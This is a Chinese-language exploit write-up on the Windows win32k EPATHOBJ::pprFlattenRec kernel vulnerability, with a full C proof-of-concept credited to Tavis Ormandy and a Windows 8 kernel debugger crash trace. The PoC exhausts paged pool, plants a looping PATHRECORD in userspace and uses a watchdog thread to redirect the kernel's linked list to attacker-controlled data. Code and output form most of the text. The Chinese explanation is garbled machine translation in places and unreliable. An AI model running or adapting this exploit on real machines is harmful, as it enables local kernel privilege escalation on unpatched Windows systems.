Windows内核EPATHOBJ 0day漏洞是根据对PATHALLOC()开展内存压力测试爆出的,最先利用PATHREC>偏向同样的的客户室内空间PATHREC EPATHOBJ::bFlatten它会”磁矩”开展无尽单链表解析xml。
如:PathRecord->next = PathRecord;
尽管它会磁矩,但它会根据另一个线程池来修复漏洞(pprFlattenRec)到目录中的连接点(因为它是在客户室内空间)。
最先,建立一个”监管进程( watchdog)”,atomically补丁包目录,由于pprFlattenRec太早撤出,bug不可以被利用会造成HeavyAllocPool
pprFlattenRec :.text:BFA122B8 call newpathrec ; EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong) .text:BFA122BD cmp eax, 1 ; Check for failure .text:BFA122C0 jz short continue .text:BFA122C2 xor eax, eax ; Exit early .text:BFA122C4 jmp early_exit因此要构建一个那样的连接点目录:
PathRecord->Next = PathRecord;PathRecord->Flags = 0;随后 EPATHOBJ::bFlatten()磁矩:
BOOL ._thiscall EPATHOBJ::bFlatten(EPATHOBJ *this){ /* ... */ for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext ) { if ( ppr->flags & PD_BEZIER ) { ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr); } } /* ... */}可以先清除另一个进程,随后再开展进程修补(由于在userspace是可以保证的)来开启该漏洞
/ / EPATHOBJ的:: bFlatten()第一个pprFlattenRec代码块:
if ( pprNew->pprPrev ) pprNew->pprPrev->pprnext = pprNew;写入 0xCCCCCCCC: DWORD WINAPI WatchdogThread(LPVOID Parameter){ ## 此程序流程请求超时会等候一个mutex目标,随后修补受损的链表指向一个漏洞。 LogMessage(L_INFO, “Watchdog thread %u waiting on Mutex () %p”, GetCurrentThreadId(), Mutex); if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) { ## 使主(main)进程没法启用FlattenPath(), ## 由于核心EPATHOBJ::bFlatten()磁矩可以被清除(clear). ## 随后修复漏洞目录来激发大家的exploit. while (NumRegion–) DeleteObject(Regions[NumRegion]); LogMessage(L_ERROR, “InterlockedExchange(%p, %p);”, &PathRecord->next, &ExploitRecord); InterlockedExchangePointer(&PathRecord->next, &ExploitRecord); } else { LogMessage(L_ERROR, “Mutex object did not timeout, list not patched”); } return 0;} PathRecord->next = PathRecord;PathRecord->prev = (PVOID)(0×42424242);PathRecord->flags = 0;ExploitRecord.next = NULL;ExploitRecord.prev = 0xCCCCCCCC;ExploitRecord.flags = PD_BEZIERS;在Win 8下的输出:
kd> g ******************************************************************************** ** Bugcheck Analysis ** ********************************************************************************Use !analyze -v to get detailed debugging information.BugCheck 50, {cccccccc, 1, 8f18972e, 2}*** WARNING: Unable to verify checksum for ComplexPath.exe *** ERROR: Module load completed but symbols could not be loaded for ComplexPath.exe Probably caused by : win32k.sys ( win32k!EPATHOBJ::pprFlattenRec 82 )Followup: MachineOwner--------- nt!RtlpBreakWithStatusInstruction:810f46f4 cc int 3 kd> kv ChildEBP RetAddr Args to Child a03ab494 8111c87d 00000003 c17b60e1 cccccccc nt!RtlpBreakWithStatusInstruction (FPO: [1,0,0]) a03ab4e4 8111c119 00000003 817d5340 a03ab8e4 nt!KiBugCheckDebugBreak 0x1c (FPO: [Non-Fpo]) a03ab8b8 810f30ba 00000050 cccccccc 00000001 nt!KeBugCheck2 0x655 (FPO: [6,239,4]) a03ab8dc 810f2ff1 00000050 cccccccc 00000001 nt!KiBugCheck2 0xc6 a03ab8fc 811a2816 00000050 cccccccc 00000001 nt!KeBugCheckEx 0x19 a03ab94c 810896cf 00000001 cccccccc a03aba2c nt! ?? ::FNODOBFM::`string' 0x31868 a03aba14 8116c4e4 00000001 cccccccc 00000000 nt!MmAccessFault 0x42d (FPO: [4,37,4]) a03aba14 8f18972e 00000001 cccccccc 00000000 nt!KiTrap0E 0xdc (FPO: [0,0] TrapFrame @ a03aba2c) a03abbac 8f103c28 0124eba0 a03abbd8 8f248f79 win32k!EPATHOBJ::pprFlattenRec 0x82 (FPO: [Non-Fpo]) a03abbb8 8f248f79 1c010779 0016fd04 8f248f18 win32k!EPATHOBJ::bFlatten 0x1f (FPO: [0,1,0]) a03abc08 8116918c 1c010779 0016fd18 776d7174 win32k!NtGdiFlattenPath 0x61 (FPO: [1,15,4]) a03abc08 776d7174 1c010779 0016fd18 776d7174 nt!KiFastCallEntry 0x12c (FPO: [0,3] TrapFrame @ a03abc14)0016fcf4 76b1552b 0124147f 1c010779 00000040 ntdll!KiFastSystemCallRet (FPO: [0,0,0])0016fcf8 0124147f 1c010779 00000040 00000000 GDI32!NtGdiFlattenPath 0xa (FPO: [1,0,0]) WARNING: Stack unwind information not available. Following frames may be wrong.0016fd18 01241ade 00000001 00202b50 00202ec8 ComplexPath 0x147f0016fd60 76ee1866 7f0de000 0016fdb0 77716911 ComplexPath 0x1ade0016fd6c 77716911 7f0de000 bc1d7832 00000000 KERNEL32!BaseThreadInitThunk 0xe (FPO: [Non-Fpo])0016fdb0 777168bd ffffffff 7778560a 00000000 ntdll!._RtlUserThreadStart 0x4a (FPO: [SEH])0016fdc0 00000000 01241b5b 7f0de000 00000000 ntdll!_RtlUserThreadStart 0x1c (FPO: [Non-Fpo]) kd> .trap a03aba2c ErrCode = 00000002 eax=cccccccc ebx=80206014 ecx=80206008 edx=85ae1224 esi=0124eba0 edi=a03abbd8 eip=8f18972e esp=a03abaa0 ebp=a03abbac iopl=0 nv up ei ng nz na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286 win32k!EPATHOBJ::pprFlattenRec 0x82:8f18972e 8918 mov dword ptr [eax],ebx ds:0023:cccccccc=???????? kd> vertarget Windows 8 Kernel Version 9200 MP (1 procs) Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTSBuilt by: 9200.16581.x86fre.win8_gdr.130410-1505Machine Name:Kernel base = 0x81010000 PsLoadedModuleList = 0x811fde48Debug session time: Mon May 20 14:17:20.259 2013 (UTC - 7:00)System Uptime: 0 days 0:02:30.432 kd> .bugcheck Bugcheck code 00000050Arguments cccccccc 00000001 8f18972e 00000002下列是实例编码POC:
#ifndef WIN32_NO_STATUS # define WIN32_NO_STATUS#endif#include <windows.h>#include <assert.h>#include <stdio.h>#include <stddef.h>#include <winnt.h>#ifdef WIN32_NO_STATUS # undef WIN32_NO_STATUS#endif#include <ntstatus.h>#pragma comment(lib, "gdi32")#pragma comment(lib, "kernel32")#pragma comment(lib, "user32")#define MAX_POLYPOINTS (8192 * 3)#define MAX_REGIONS 8192#define CYCLE_TIMEOUT 10000//// win32k!EPATHOBJ::pprFlattenRec uninitialized Next pointer testcase.//// Tavis Ormandy <taviso () cmpxchg8b com>, March 2013// POINT Points[MAX_POLYPOINTS]; BYTE PointTypes[MAX_POLYPOINTS]; HRGN Regions[MAX_REGIONS]; ULONG NumRegion; HANDLE Mutex;// Log levels.typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL; BOOL LogMessage(LEVEL Level, PCHAR Format, ...);// Copied from winddi.h from the DDK#define PD_BEGINSUBPATH 0x00000001#define PD_ENDSUBPATH 0x00000002#define PD_RESETSTYLE 0x00000004#define PD_CLOSEFIGURE 0x00000008#define PD_BEZIERS 0x00000010typedef struct _POINTFIX { ULONG x; ULONG y;} POINTFIX, *PPOINTFIX;// Approximated from reverse engineering.typedef struct _PATHRECORD { struct _PATHRECORD *next; struct _PATHRECORD *prev; ULONG flags; ULONG count; POINTFIX points[0];} PATHRECORD, *PPATHRECORD; PPATHRECORD PathRecord; PATHRECORD ExploitRecord; DWORD WINAPI WatchdogThread(LPVOID Parameter){ // This routine waits for a mutex object to timeout, then patches the // compromised linked list to point to an exploit. We need to do this. LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex () %p", GetCurrentThreadId(), Mutex); if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) { // It looks like the main thread is stuck in a call to FlattenPath(), // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean // up, and then patch the list to trigger our exploit. while (NumRegion--) DeleteObject(Regions[NumRegion]); LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &PathRecord->next, &ExploitRecord); InterlockedExchangePointer(&PathRecord->next, &ExploitRecord); } else { LogMessage(L_ERROR, "Mutex object did not timeout, list not patched"); } return 0;}int main(int argc, char **argv){ HANDLE Thread; HDC Device; ULONG Size; HRGN Buffer; ULONG PointNum; ULONG Count; // Create our PATHRECORD in userspace we will get added to the EPATHOBJ // pathrecord chain. PathRecord = VirtualAlloc(NULL, sizeof(PATHRECORD), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); LogMessage(L_INFO, "Alllocated userspace PATHRECORD () %p", PathRecord); // Initialise with recognisable debugging values. FillMemory(PathRecord, sizeof(PATHRECORD), 0xCC); PathRecord->next = PathRecord; PathRecord->prev = (PVOID)(0x42424242); // You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from 必须从EPATHOBJ::pprflattenRec()键入PD——BEZIERS,那样就可以开启不断循环。 // EPATHOBJ::bFlatten(). We don't set it so that we can trigger an infinite // loop in EPATHOBJ::bFlatten(). PathRecord->flags = 0; LogMessage(L_INFO, " ->next @ %p", PathRecord->next); LogMessage(L_INFO, " ->prev @ %p", PathRecord->prev); LogMessage(L_INFO, " ->flags @ %u", PathRecord->flags); ExploitRecord.next = NULL; ExploitRecord.prev = 0xCCCCCCCC; ExploitRecord.flags = PD_BEZIERS; LogMessage(L_INFO, "Creating complex bezier path with %#x", (ULONG)(PathRecord) >> 4); // Generate a large number of Bezier Curves made up of pointers to our // PATHRECORD object. for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum ) { Points[PointNum].x = (ULONG)(PathRecord) >> 4; Points[PointNum].y = (ULONG)(PathRecord) >> 4; PointTypes[PointNum] = PT_BEZIERTO; } // Switch to a dedicated desktop so we don't spam the visible desktop with // our Lines (Not required, just stops the screen from redrawing slowly). SetThreadDesktop(CreateDesktop("DontPanic", NULL, NULL, 0, GENERIC_ALL, NULL)); Mutex = CreateMutex(NULL, TRUE, NULL); // Get a handle to this Desktop. Device = GetDC(NULL); // Spawn a thread to cleanup Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL); // We need to cause a specific AllocObject() to fail to trigger the // exploitable condition. To do this, I create a large number of rounded // rectangular regions until they start failing. I don't think it matters // what you use to exhaust paged memory, there is probably a better way. // // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on // failure. Seriously, do some damn QA Microsoft, wtf. for (Size = 1 << 26; Size; Size >>= 1) { while (Regions[NumRegion] = CreateRoundRectRgn(0, 0, 1, Size, 1, 1)) NumRegion ; } LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion); LogMessage(L_INFO, "Flattening curves..."); // Begin filling the free list with our points. for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) { BeginPath(Device); PolyDraw(Device, Points, PointTypes, PointNum); EndPath(Device); FlattenPath(Device); FlattenPath(Device); EndPath(Device); } LogMessage(L_INFO, "No luck, cleaning up"); // If we reach here, we didn't trigger the condition. Let the other thread know. ReleaseMutex(Mutex); ReleaseDC(NULL, Device); WaitForSingleObject(Thread, INFINITE); return 0;}// A quick logging routine for debug messages. BOOL LogMessage(LEVEL Level, PCHAR Format, ...){ CHAR Buffer[1024] = {0}; va_list Args; va_start(Args, Format); vsnprintf_s(Buffer, sizeof Buffer, _TRUNCATE, Format, Args); va_end(Args); switch (Level) { case L_DEBUG: fprintf(stdout, "[?] %s\n", Buffer); break; case L_INFO: fprintf(stdout, "[ ] %s\n", Buffer); break; case L_WARN: fprintf(stderr, "[*] %s\n", Buffer); break; case L_ERROR: fprintf(stderr, "[!] %s\n\a", Buffer); break; } fflush(stdout); fflush(stderr); return TRUE;}